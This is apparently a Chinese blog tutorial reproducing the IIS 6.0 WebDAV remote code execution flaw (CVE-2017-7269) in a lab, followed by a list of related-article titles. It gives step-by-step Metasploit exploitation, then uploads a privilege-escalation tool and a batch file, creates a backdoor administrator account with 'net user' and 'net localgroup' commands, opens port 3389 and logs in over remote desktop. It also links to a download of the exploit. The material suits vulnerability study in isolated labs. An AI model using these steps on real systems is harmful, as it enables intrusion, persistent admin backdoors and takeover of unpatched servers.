iis6.0远程代码执行漏洞

1、实验环境搭建

目标主机Windows server2003 sp2

2、目标服务器需要在IIS里面开启WebDAV

3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址)

Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址)

4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下:
注:exp为资源包,可自行下载,稍后上传到csdn

https://download.csdn.net/download/G208_522/46134521

kali中启动Msfconsole,使用CVE-2017-7269攻击插件

输入:msfconsole启动metasploit

5、然后reload_all****重启****加载exp。

6、use exploit/windows/iis/cve_2017_7269。

7、使用show options查看相关参数。

8、设置目标主机,http主机,以及返回载荷。

9、设置完成,exploit

10、输入shell查看目前接入权限

11、进入C盘

12、使用md命令创建123文件夹

使用dir命令查看,以及存在123文件夹

13、使用IIS6.exe提权

输入exit退出至msf命令模式下

使用upload命令上传IIS6.exe以及3389.bat文件至win2003 C盘下123文件夹。

14、输入shell进入2003系统,使用提权工具,查看当前权限。

创建用户

IIS6.0.exe “net user zhangsan 123456 /add”

把张三加入到管理员组

IIS6.0.exe “net localgroup Administrators zhangsan /add”

查看系统是否开启3389端口。

使用iis6.exe 执行上传的3389.bat文件。

3389端口已经打开。

我们使用zhangsan用户进行远程连接。

打开win10下远程桌面(快捷命令为mstsc)

iis6.0远程代码执行漏洞相关推荐

  1. IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现

    CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...

  2. wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943

    近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心中的远程代码执行漏洞.代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码.据漏洞披露者文中所介 ...

  3. thinkphp v5.0.11漏洞_Thinkphp 5.0远程代码执行漏洞

    0x01 简叙本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版 ...

  4. 远程过程调用失败0x800706be_WordPress5.0 远程代码执行分析

    本文作者:七月火 2019年2月19日,RIPS 团队官方博客放出 WordPress5.0.0 RCE 漏洞详情,漏洞利用比较有趣,但其中多处细节部分并未放出,特别是其中利用到的 LFI 并未指明, ...

  5. thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞

     漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...

  6. layuiajax提交表单控制层代码_漏洞预警|ThinkPHP 5.0 远程代码执行

    漏洞预警|ThinkPHP 5.0 远程代码执行 2019-01-11 事件来源 2019年1月11日,ThinkPHP Github仓库发布了新的版本v5.0.24,包含重要的安全更新,山石安服团队 ...

  7. sqlite 0转换为bit_Cisco Talos在SQLite中发现了一个远程代码执行漏洞

    思科Talos的研究人员在SQLite中发现了一个use-after-free() 的漏洞,攻击者可利用该漏洞在受影响设备上远程执行代码. 攻击者可以通过向受影响的SQLite安装发送恶意SQL命令来 ...

  8. thinkphp v5.0.11漏洞_ThinkPHP5丨远程代码执行漏洞动态分析

    ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性.但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏 ...

  9. Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)

    thinkphp-RCE-POC 官方公告: 1.https://blog.thinkphp.cn/869075 2.https://blog.thinkphp.cn/910675 POC: 批量检测 ...

  10. 【更新1.0:PoC发布】CVE-2020-1350: Windows DNS Server蠕虫级远程代码执行漏洞通告

    0x00 更新概览 2020年07月16日,360CERT监测到 FSecureLabs 发布了 PoC,可造成拒绝服务影响.本次更新标识该漏洞极易可能在短时间内出现大规模攻击态势. 具体更新详情可参 ...

最新文章

  1. 【GCN】图卷积网络 Graph Convolutional Networks
  2. IDLE 策略算法 放置奇兵 小破船翻船记录(悬空岛——冒险(航海))
  3. c语言,c++求最大公因数与最小公倍数方法集合
  4. 李浩:无限节点的CDN架构演进
  5. MAC OS 命令行使用详解
  6. IDEA配置Maven-scala方式具体操作
  7. zypper 删除mysql_如何在 Linux 上安装/卸载一个文件中列出的软件包?
  8. 蔡先生论道大数据之八: 让他在看小说的时候, 看到喜欢的汽车
  9. 也来学学插件式开发续-利用MEF
  10. html5在线制作教程,HTML5 Canvas 制作动画
  11. java json传值到前台_json前后台传值
  12. Linux第二周考试题
  13. SpringBoot开发的java后台管理系统
  14. Mysql 常用命令
  15. jquery提交整个form表单
  16. android 自定义menu菜单按键功能
  17. 根据OVF文件在VMware Workstation中恢复虚拟机
  18. html的毕业设计步骤和方法,毕业论文写作的8大步骤
  19. 最新 UltraEdit 24.20 注册成功经验分享
  20. Sysweld笔记:利用稳态算法加速算法模拟焊接过程的残余应力

热门文章

  1. CentOS操作系统服务器搭建MYSQL数据库
  2. java 映射类的方法_java什么是映射
  3. RRT 算法原理以及过程演示
  4. Linux好用命令之dig命令
  5. php读取excel 报错_PHP读取Excel里的文件
  6. python实现动态壁纸_Python 实现macOS Catalina 动态壁纸定时设置
  7. matlab箭头梯度方向场,局部路径规划算法——人工势场法
  8. 代码比对方法/代码比对工具
  9. linux 运行可执行文件
  10. 有限差分法与有限单元法的区别